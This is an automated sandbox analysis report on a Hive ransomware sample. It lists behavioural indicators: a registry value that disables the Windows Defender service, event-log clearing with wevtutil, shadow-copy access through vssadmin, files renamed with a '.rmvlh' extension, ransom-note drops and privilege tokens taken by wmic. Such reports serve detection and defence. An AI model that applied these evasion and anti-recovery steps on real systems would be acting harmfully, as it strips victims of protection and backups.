Malware Analysis Report

2024-10-16 03:13

Sample ID 220113-p9l6fsace2
Target cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
SHA256 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52

Threat Level: Known bad

The file cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52 was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Modifies Windows Defender Real-time Protection settings

Hive

Deletes Windows Defender Definitions

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Interacts with shadow copies

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 13:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 13:01

Reported

2022-01-13 13:06

Platform

win7-en-20211208

Max time kernel

181s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion

Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_mNvCmA5ZLMU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_aTbNUIQxhh80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_yVj3hWduYV00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb__bBaHX0cMVw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\F12.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_Bpug1XGmR3E0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_H0Dpy-OaGWk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_v5zX94j6C5I0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_ddFaBYf7CLg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_lBeg1OU5lNk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_r1mME8XvYp40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_x6wXvrX0zgg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CERT.XML.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_z_I04DGk7pI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\sXhL_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_e2lhUbVdiJA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_FhtD1ZjWZqY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_zPJrbu0fdoY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_XWgfB_YHTK00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xGgry6LVrA40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_m0DueXHp7Os0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_b8254kpR1Mw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\timeZones.js C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_N388AWPpelM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_bamtAESh67w0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_hj_qJl65BXg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TAIL.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_3_-kf0ic6a00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow.css.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_Qyp-DWr38t00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_MPW8Bawvh800.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_8MrpvyrJz7A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_zyJmJNlTMUA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xLrHbrEAnlM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_AhjUQ3r6_sk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_nJG73JROZyc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_8u08-Ayo1Jg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\MLA.XSL.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_-jftVjVu1zA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\ShapeCollector.exe.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_ip_asTVIsPU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_MWU6pXnZjOs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_5wBjYJsuoy00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21309_.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_oJafXVSSnyQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_PbLayShQWQI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50F.GIF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_xII8clN5oYs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_XbO3rwG2rkg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_r5yuOI0n4YM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\DVD Maker\soniccolorconverter.ax C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_oanMzuy2iiI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb__WKFw29mrTo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_gTE6Pv6dQz80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_tqaXwHTCTP80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\sXhL_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_hsfvpypUZK00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_6hK9zNuXIN80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_6iu-7bmQ-8A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Adjacency.thmx.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_EW97BkNXIc00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0212661.WMF.de9nR9iIqo0kXnbNdgiNrVQvTYAPOyLhK-ZUXU0NVzb_wN2bf6ZMgOY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
